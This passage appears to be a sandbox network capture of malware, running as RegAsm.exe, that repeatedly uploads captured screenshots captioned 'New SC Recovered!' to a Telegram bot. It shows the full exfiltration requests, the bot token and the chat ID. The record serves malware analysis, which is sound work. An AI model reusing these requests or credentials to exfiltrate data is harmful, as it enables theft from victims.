                                                2024-05-24 05:44:24 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:24 UTC1168OUTData Raw: bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b db 64 6d 4a 6e 95 37 05 d7 a8 51 45 15 dc 40 56 be 91 aa 2c 09 f6 79 ce 13 f8 5b d3 da 99 0f 87 35 79 e1 49 a3 b4 dd 1c 8a 19 4f 98 83 20 f2 3b d3 ff 00 e1 17 d6 bf e7 cb ff 00 22 a7 f8 d2 95 37 25 66 8c e7 c9 25 66 ce bf 4c d5 2f 26 64 86 2b b1 e5 ff 00 7f 0a 4a af b3 1e 45 47 e2 2f 14 5b 5a 5a 3d b5 94 c2 6b 96 05 77 29 c8 4f 7c f7 35 ca 7f c2 2f ad 7f cf 97 fe 45 4f f1 a3 fe 11 7d 6b fe 7c bf f2 2a 7f 8d 71 cf 00 ea cd 4a a3 6d 2e 86 b4 2a aa 31 71 4f 57 d4 c7 a2 b4 86 83 aa 30 04 5a f0 79 fb eb fe 35 9f 2c 6f 14 af 14 83 0e 84 ab 0f 42 2b b5 a6 84 9a 63 68 a2
                                                Data Ascii: +zQRVdNj7SmyyqY^*<ZC /@=qW#U*;dmJn7QE@V,y[5yIO ;"7%f%fL/&d+JEG/[ZZ=kw)O|5/EO}k|*qJm.*1qOW0Zy5,oB+ch
                                                2024-05-24 05:44:24 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 62 36 63 38 38 61 64 64 35 66 37 37 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcb6c88add5f77--
                                                2024-05-24 05:44:24 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:24 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                14 | 192.168.2.7 | 49720 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:51 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc4c57a67a1f1
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:51 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:51 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 35 2f 32 30 32 34 20 30 35 3a 30 39 3a 31 39 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc4c57a67a1f1Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcc4c57a67a1f1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/25/2024 05:09:19User
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:51 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:51 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:51 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:44:51 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 34 63 35 37 61 36 37 61 31 66 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc4c57a67a1f1--
                                                2024-05-24 05:44:51 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:51 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                15 | 192.168.2.7 | 49721 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:44:54 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcc78492d93770
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:44:54 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:44:54 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 38 2f 32 38 2f 32 30 32 34 20 31 37 3a 30 32 3a 31 31 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcc78492d93770Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dcc78492d93770Content-Disposition: form-data; name="caption"New SC Recovered!Time: 08/28/2024 17:02:11User
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                                Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                                2024-05-24 05:44:54 UTC16355OUTData Raw: 31 a8 ff 00 c8 4a eb fe ba bf f3 35 c7 80 fe 23 f4 ff 00 23 5c d7 f8 2b d7 f4 65 7a 28 a2 bd 73 e7 42 8a 28 a0 0e d3 fe 59 e8 df ef 8f fd 12 f4 fb bd 62 ce d3 50 82 ca 57 c4 92 f7 ec be 99 fa d6 7e ad 7b fd 9d a3 e9 b7 61 37 98 ca e0 7b 98 98 0f e7 5c 25 c4 f2 dc ce f3 cc e5 e4 73 96 26 bc 9c 3e 1b db 2b bd 8f a8 c4 62 7d 8b b2 dc f5 92 46 40 cf 26 b3 1f fd 46 b5 fe f1 ff 00 d1 29 5c 7b 6b 17 33 5b da 5c 89 4f da ac 4e 0e 4f 0e 87 bf f4 3e b9 15 d3 58 de a6 a1 a4 ea b7 71 82 ab 21 63 83 d8 88 50 11 f9 8a ce a6 1e 54 a2 db fe b5 34 a7 88 8d 59 24 bf ad 0e 5a 8a 29 6b db 3e 50 4a 28 a2 80 29 ea 7f f1 ee bf ef 8f e4 6b 47 fe 11 eb 69 35 4d 32 28 a4 9b ec b7 70 79 cc cc c3 72 e0 12 79 c6 3d 2b 3b 53 ff 00 8f 75 ff 00 7c 7f 23 5b ba 7e a7 6a be 11 2f 24 f1 8b
                                                Data Ascii: 1J5##\+ez(sB(YbPW~{a7{\%s&>+b}F@&F)\{k3[\ONO>Xq!cPT4Y$Z)k>PJ()kGi5M2(pyry=+;Su|#[~j/$
                                                2024-05-24 05:44:54 UTC15447OUTData Raw: 5c b2 0a 28 a2 b6 39 c2 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 02 92 96 92 81 85 14 51 40 05 14 51 40 09 45 14 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 60 14 51 45 00 14 51 45 00 25 14 51 40 c2 92 96 92 80 0a 28 a2 81 85 14 51 40 09 45 14 50 01 45 14 50 30 a4 34 bd a9 28 00 a2 8a 28 01 28 a2 8a 06 14 94 b4 94 00 51 45 14 00 94 52 d2 50 30 a2 8a 28 00 a4 a2 8a 63 0a 28 a2 80 12 8a 33 49 9a 06 2d 25 25 14 05 83 3e d4 99 a2 8a 06 14 94 b4 94 00 52 52 d2 50 30 a2 8a 28 18 52 51 45 00 14 94 b4 94 0c 28 a2 8a 00 4a 28 a2 81 88 68 a2 8a 00 29 29 69 28 18 52 52 d2 50 01 49 4b 45 05 09 45 14 94 02 16 92 8a 28 01 0d 14 51 40 c2 92 96 92 81 85 25 14 50 02 51 4b 49 40 c2 92 96 92 81 85 25 14 50 01 49 4b 45 03 12 8a 28 a0 61 49 45 25 00 2d 25 14 50 30
                                                Data Ascii: \(9((((Q@Q@EPEPEP0(`QEQE%Q@(Q@EPEP04(((QERP0(c(3I-%%>RRP0(RQE(J(h))i(RRPIKEE(Q@%PQKI@%PIKE(aIE%-%P0
                                                2024-05-24 05:44:54 UTC1179OUTData Raw: 56 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b 06 8a 99 45 49 59 91 38 29 ab 33 d3 34 dd 4e ee e5 b6 bd e6 d8 10 65 e4 3b 41 c7 a6 ee bf ad 65 78 ab c4 f0 49 6a f6 16 12 09 0c 83 12 48 bd 00 f4 1e b5 c4 51 5c 8f 06 a7 55 54 a8 ef 6d 91 b5 29 ba 54 dc 17 5e a1 45 14 57 71 01 5a fa 46 a8 b0 27 d9 e7 38 4f e1 6f 4f 6a 64 3e 1c d5 e7 85 26 8e d3 74 72 28 65 3e 62 0c 83 c8 ef 4f ff 00 84 5f 5a ff 00 9f 2f fc 8a 9f e3 4a 54 dc 95 9a 33 9f 24 95 9b 3a fd 33 54 bc 99 92 18 ae c7 97 fd fc 29 2a be cc 79 15 1f 88 bc 51 6d 69 68 f6 d6 53 09 ae 58 15 dc a7 21 3d f3 dc d7 29 ff 00 08 be b5 ff 00 3e 5f f9 15 3f c6 8f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 35 c7 3c 03 ab 35 2a 8d b4 ba 1a d0 aa a8 c5 c5 3d 5f 53 1e 8a d2 1a 0e a8 c0 11 6b c1 e7 ef af f8 d6 7c b1 bc 52 bc 52 0c 3a
                                                Data Ascii: V `2+EIY8)34Ne;AexIjHQ\UTm)T^EWqZF'8OoOjd>&tr(e>bO_Z/JT3$:3T)*yQmihSX!=)>_?E5<5*=_Sk|RR:
                                                2024-05-24 05:44:54 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 37 38 34 39 32 64 39 33 37 37 30 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dcc78492d93770--
                                                2024-05-24 05:44:54 UTC | 402 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Fri, 24 May 2024 05:44:54 GMT
                                                Content-Type: application/json
                                                Content-Length: 56
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":400,"description":"Logged out"}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                16 | 192.168.2.7 | 49722 | 149.154.167.220 | 443 | 6596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-05-24 05:45:00 UTC | 262 | OUT | POST /bot7043330881:AAFq19dRSS-89_wbwEvbuucof5Z3tCHG2NY/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dccb6d9b422ea1
                                                Host: api.telegram.org
                                                Content-Length: 66765
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-05-24 05:45:00 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                2024-05-24 05:45:00 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 36 35 35 33 30 32 38 32 37 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 63 62 36 64 39 62 34 32 32 65 61 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 30 32 2f 32 30 32 34 20 31 36 3a 33 37 3a 35 37 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dccb6d9b422ea1Content-Disposition: form-data; name="chat_id"6553028274-----------------------------8dccb6d9b422ea1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 09/02/2024 16:37:57User
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                                Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                                2024-05-24 05:45:00 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
